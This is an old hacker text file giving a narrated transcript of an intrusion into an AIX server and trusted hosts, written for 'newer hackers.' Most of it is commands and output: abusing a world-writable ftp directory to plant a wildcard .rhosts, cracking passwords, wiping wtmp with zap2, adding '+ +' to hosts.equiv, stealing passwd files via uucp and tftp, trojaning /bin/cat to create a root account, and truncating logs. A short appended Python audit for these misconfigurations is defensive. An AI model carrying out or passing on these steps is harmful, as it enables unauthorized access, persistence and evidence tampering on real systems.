
An Inside Look at Computer Security

I wrote this paper to show some of the newer hackers what hacking really is. These logs are actual transcripts of my security sessions, recorded in better telnet 2 and stripped of anything which could identify the computers I exploited.

The commands I typed in at my computer are bold, and my comments throughout my sessions are underlined. I used dividers to separate my different protocol sessions on the computer. I am doing all of this from a local box, a friend's computer, which I telnetted to. These sessions were strictly evaluation, nothing malicious was done.

Sorry if this is a little over some of your heads, but I explain it better as I actually do it. I exploit a misconfigured ftpd through a writeable user directory, setting universal access to the users r services, giving me access to the system through his account. I use rlogin to exploit my hack, identifying my account as a trusted, possibly local user, which leaves my evaluation less likely to be noticed. I locate the passwd backup, crack it, and su to root, bypassing console security. I transfer a log clearing program, zap2, and remove myself from wtmp dependent software, including who and w. Syslogd hasn't been set up, which saves me a lot of time which would have been spent clearing the logs dependent on it. I become trusted by the systems r daemons through hosts.equiv, giving me _complete_ access to the system and all its accounts. I exploit another r setup in case the hosts.equiv exploit is detected and removed. Exploiting a misconfigured uucp, I obtain a trusted system's passwd file, gaining access to that system as well as another one running a misconfigured trivial ftp daemon. I telnet to the system I exploited through uucp, and set a trojan in cat which will give me root. I clear my history, and logout of the uucp exploited system. I clear uulog and my shell history on the main server, and logout of the system.

logik

logik@snip.net

http://www.cyberpunkz.com/logik

 

______________________local box________________________________

# ftp main.server

_____________________________mainserver ftp[21]________________________________

220 FTP server (Version 4.1 Sat Apr 20 13:05:42 CDT 1996) ready.
USER anonymous
331 Guest log in, send Email address (user@host) as password.
PASS
230 Anonymous login ready.    /* I login to the server as guest */
PWD
257 PWD command successful.
TYPE A
200 Type set to A, ASCII transfer mode.
PORT 208,211,79,65,8,29
200 PORT command successful.
CWD /usr/
250 cd successful.
LIST -alL
150 ASCII transfer started.
total 3
drwxr-xr-x 4 101 1 512 Jun 20 1998 .
drwxr-xr-x 4 101 1 512 Jun 20 1998 ..
drwxr-xrwx 2 0 1 512 Jun 20 1998 leon    /* Haha! Misconfigured privileges! Looks like leon set access a bit too high */
226 ASCII Transfer complete.
242 bytes received in 0.066 seconds (3.6 Kbytes/s)
CWD /usr/leon/
250 cd successful.
PUT wcd.rhosts .rhosts    /* I exploit the bad permissions by uploading a small file with a wildcarded '.rhosts' structure. */
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
QUIT
221 Goodbye.

 

____________________________local box________________________________

# rlogin mainserver.address.removed -l leon

______________________mainserver rlogin___________________________________

*******************************************************************************
*                                                                             *
*                                                                             *
*  Welcome to AIX Version 4.2!                                                *
*                                                                             *
*                                                                             *
*  Please see the README file in /usr/lpp/bos for information pertinent to    *
*  this release of the AIX Operating System.                                  *
*                                                                             *
*                                                                             *
*******************************************************************************

Last unsuccessful login: Wed Jun 10 13:27:00 CDT 1998 on /dev/pts/1 from address.removed
Last login: Wed Jun 10 13:33:20 CDT 1998 on /dev/pts/2 from address.removed

 

 

 

$ csh
$ cat /var/adm/sulog    /* Hmm, I wonder who's trusted on the system? */
SU 01/16 15:49 + pts/0 leon-root
SU 01/27 11:04 + pts/0 leon-root
SU 06/06 17:57 + tty?? notes-root
SU 06/06 17:57 + tty?? leon-root    /* Obviously, the user leon… which is great for me since I already have access to his account */
SU 10/01 10:14 + tty?? root-root
SU 10/01 10:14 + tty?? root-root

$ cd /etc/security ; ls -a    /* Where's that passwd file? */
.         audit        lastlog    ogroup    ouser      user
..        environ      limits     olastlog  passwd
.ids      failedlogin  login.cfg  olimits   portlog    /* Heh, right here */
.profile  group        oenviron   opasswd   sysck.cfg

$ cat passwd
passwd removed    /* Passwd file removed from paper */

$ su root
Password:
/* Got the passwd file… now which user will save me some time when clearing logs? Leon! Why? Because leon is a trusted user, possibly local, who, when the sulog is examined, won't be noticed. I crack the passwd file, and su to root… */

 

 

 

# csh    /* I switch to the C shell */
# w      /* and check for users */
01:38PM up 12 days, 5:36, 4 users, load average: 0.13, 0.09, 0.10
User  tty    login@   idle   JCPU  PCPU  what
root         29May98  11     0     0     -
root  pts/0  02:16PM  22:59  0     0     vi
root  pts/1  01:36PM  0      0     0     w      /* Me of course… I should really remove myself. */
root  pts/2  01:33PM  5      0     0     -ksh

 

 

 

# cd /
# kermit    /* I use the kermit protocol to transfer an AIX binary of zap2 from a local system */
Kermit 5A(190) ALPHA.01, 31 Mar 94, for AIX 4.x
Type ? or HELP for help
Kermit>rece
Return to your local Kermit and give a SEND command.

KERMIT READY TO RECEIVE...
Kermit>quit

# last root | head    /* and check entries for root */
root  pts/0  removed1.host.com  May 29 02:16  still logged in
root  pts/2  removed.host.com   May 29 07:36  still logged in
root  pts/1  my.host.com        May 29 01:33  still logged in

wtmp begins May 3 14:22

# zap2 root    /* I use zap2, making myself invisible to programs which depend on a wtmp to function correctly, like 'w'. */
Zap2!

# last root | head
root  pts/0  removed1.host.com  May 29 02:16  still logged in
root  pts/2  removed.host.com   May 29 07:36  still logged in

wtmp begins May 3 14:22

# w
01:39PM up 12 days, 5:36, 3 users, load average: 0.13, 0.09, 0.10
User  tty    login@   idle   JCPU  PCPU  what
root         29May98  12     0     0     -
root  pts/0  02:16PM  23:22  0     0     vi
root  pts/2  01:33PM  6      0     0     -ksh

# rm zap2*    /* I remove zap2 */

 

# cd /etc ; ls -a
.                  gated.conf   ntp.conf        securetcpip
..                 group        objrepos        security
.init.state        hosts        ogroup          sendmail.cf
.lmcslock          hosts.equiv  opasswd         sendmail.pid
3270.keys          hosts.lpd    options.file    services
3270_arab_kyb.map  ifconfig     passwd          slip.hosts
3270keys.dtterm    inetd.conf   ping            slip.login
3270keys.hft       init         profile         slip.logout
acct               inittab      protocols       snmpd.conf
aliases            isoaliases   pse.conf        snmpd.peers
basecust           isobjects    pse_tune.conf   swapspaces
bootpd.dump        isoentities  qconfig         syslog.conf
bootptab           isomacros    qconfig.bin     syslog.pid
consdef            isoservices  rc              tcp.clean
csh.cshrc          locks        rc.bsdnet       telnet.conf
csh.login          lpp          rc.dt           totalnet
dhcpcd.ini         magic        rc.lsserver     trcfmt
dhcprd.cnf         map3270      rc.net          tsh_profile
dhcpsd.cnf         mcs0         rc.net.serial   utmp
dlpi.conf          mcsnet       rc.powerfail    uucp
drivers            mcstab       rc.tcpip        vfs
dt                 mcstab.old   resolv.conf     vg
dtappintegrate     methods      route           x_st_mgr
dumpdates          mib.defs     rpc             xferlog
environment        microcode    ruhelp          xlC.cfg
filesystems        motd         rutils.hlp      xtiso.conf

 

 

 

# tail syslog.conf    /* I check how the syslogd daemon is set up. */
# Save mail and news errors of level err and higher in a
# special file.
/* Syslogd hasn't been configured, and no serious logging is being done */

# echo + + >> hosts.equiv ; tail hosts.equiv    /* Haha! I am now trusted (heh, and actually so is everyone else.) */
# Examples:
#
# host user           allows access to user on host
# + user              allows access to user on any host
# host -user          denies access to user on host
# -host               denies access to all users on host
# -@group             denies access to all users on hosts in group
# +@group1 +@group2   allows access to users in group2 on hosts in group1
+ +

 

 

 

# cd notes ; ls -a
.            .Xpdefaults  .profile     lost+found  smit.script
..           .dt          .sh_history  notesr4
.Xauthority  .dtprofile   TT_DB        smit.log

# echo + + > .rhosts    /* In fact, I like being trusted so much that I become trusted through another account, similar to the way I gained access in the first place through ftpd */
# ls -a    /* There we go, rhosts is set. */
.            .Xpdefaults  .profile     TT_DB       smit.log
..           .dt          .rhosts      lost+found  smit.script
.Xauthority  .dtprofile   .sh_history  notesr4

 

 

 

# uuname    /* Wow, a poorly configured uucp setup. Let's see which computers this one is linked to */
nremoved1
nremoved2

# uucp nremoved1\!/etc/passwd\/tmp    /* I transfer the passwd file from nremoved1 to the '/tmp' directory, examine it, and remove it */
# cat /tmp/passwd ; rm /tmp/passwd
passwd removed    /* Passwd removed from paper */

# tftp    /* Hmm, another weak protocol implementation? Fortunately, yes. I connect via the trivial file transfer protocol to nremoved2, and download their passwd file, saving it in /tmp. */
tftp> connect nremoved2
tftp> get /etc/passwd /tmp/passwd
tftp> quit

# cat /tmp/passwd ; rm /tmp/passwd    /* Again, I examine the new passwds, and remove the file */
passwd removed    /* Passwd removed from paper */

telnet nremoved1    /* I crack nremoved1's passwd file, and telnet to one of the hacked accounts */
Trying xxx.xxx.x.xx...
Connected to nremoved1.
Escape character is '^]'.

 

Connected to nremoved1.

 

Escape character is '^]'.

 

 

 

_________________nremoved1 telnet [23]_________________________

login: mjake
Password:
Last login: Thu Aug 2 21:00:45 on ttyp1 from host2.removed

$ cd /bin ; ls -la
total 18920
drwxr-xr-x  8 root  wheel    1024 Aug 15 23:42 .
drwxr-xr-x 24 root  wheel     512 Aug 16 13:43 ..
-r-xr-xr-x  2 root  bin     49152 Aug 15 23:42 [
-rwxrwxrwx  1 root  bin     53248 Aug 15 23:41 cat    /* notice how cat's privs are misconfigured, making it simple to gain root. */
-r-xr-xr-x  1 root  bin     53248 Aug 15 23:41 chio
-r-xr-xr-x  2 root  bin     65536 Aug 15 23:41 chmod
-r-xr-xr-x  1 root  bin     65536 Aug 15 23:41 cp
-r-xr-xr-x  3 root  bin    241664 Aug 15 23:42 cpio
-r-xr-xrwx  1 root  bin    245760 Aug 15 23:41 csh
-r-xrwxr-x  2 root  bin     73728 Aug 15 23:41 date

/* The rest of the output from ls was cut out due to its length and redundancy to this paper. */

 

 

 

$ mv /bin/cat /bin/cat.save ; echo "echo 'lx::0:0:l-x:/:/bin/tcsh >> /etc/passwd'" > cat\
? chmod cat +377
/* Wow, I'd just like to thank the administrator at nremoved1 for granting me root access through my favorite shell. I also change the mode on my trojan to what the original cat program was */

$ mv .logout s1
$ echo rm .history>.logout    /* I'll most likely use this account again, so what the hell. */
$ echo rm .logout>>.logout
$ echo mv s1 .logout>>.logout

 

 

 

____________________mainserver rlogin___________________________

$ logout
Connection closed.

# head /.sh_history > ad ; cat ad > .sh_history ; rm ad;\
? head uulog > ke ; cat ke > uulog ; rm ke;\
? head /etc/xferlog > x2 ; cat x2 > /etc/xferlog ; rm x2
/* I clear the only logs which really need clearing right now, my shell history, uulog, and xferlog. */

# logout
Connection closed.

______________________________local box____________________________

# logout

________________________________session ended______________________________

/* and logout of the systems, after gaining root access to two trusted boxes, and a passwd file on another */
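Every foothold in this log rests on a permission or trust setting an administrator can check for: a home directory under /usr that anyone can write to, a system binary in /bin that a non-owner can replace, and a "+ +" wildcard in hosts.equiv or .rhosts. The audit below is an added example, not part of the original paper; the function names are mine, and the listings and trust file are constructed samples modelled on the output shown above.

```python
import re

# Constructed samples modelled on the listings and trust file shown in the
# log above; the entries are illustrative, not captured from a live host.
LS_USR = """total 3
drwxr-xr-x 4 101 1 512 Jun 20 1998 .
drwxr-xr-x 4 101 1 512 Jun 20 1998 ..
drwxr-xrwx 2 0 1 512 Jun 20 1998 leon"""

LS_BIN = """-r-xr-xr-x 2 root bin 49152 Aug 15 23:42 [
-rwxrwxrwx 1 root bin 53248 Aug 15 23:41 cat
-r-xr-xr-x 2 root bin 65536 Aug 15 23:41 chmod
-r-xr-xrwx 1 root bin 245760 Aug 15 23:41 csh
-r-xrwxr-x 2 root bin 73728 Aug 15 23:41 date"""

HOSTS_EQUIV = """# Examples:
# + user allows access to user on any host
# +@group1 +@group2 allows access to users in group2 on hosts in group1
+ +
"""

MODE_RE = re.compile(r"[-dl][rwxsStT-]{9}")   # e.g. drwxr-xrwx

def writable_by_non_owner(listing):
    """Return (name, who) for every 'ls -l' entry whose group or other write
    bit is set; a home directory or a /bin binary should never have either."""
    hits = []
    for line in listing.splitlines():
        parts = line.split(None, 8)       # name is the 9th field, may hold spaces
        if len(parts) < 9 or not MODE_RE.fullmatch(parts[0]):
            continue                      # skips 'total N' and malformed lines
        mode, name = parts[0], parts[8]
        if mode[5] == "w":                # rwxrwxrwx: index 5 is group write
            hits.append((name, "group"))
        if mode[8] == "w":                # index 8 is other (world) write
            hits.append((name, "other"))
    return hits

def open_trust_entries(text):
    """Return hosts.equiv/.rhosts entries that trust every host ('+' in the
    host field) or every user ('+' in the user field); '+ +' is both."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+" or user == "+":
            hits.append(line)
    return hits
```

On a live host the same two functions can be fed the real output of `ls -la` and the contents of /etc/hosts.equiv and each ~/.rhosts; a non-empty result from either is a finding to fix.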

werd to mantis, archa, jabuke, tIs, sOs and everyone else who helped me out when I first started working with security…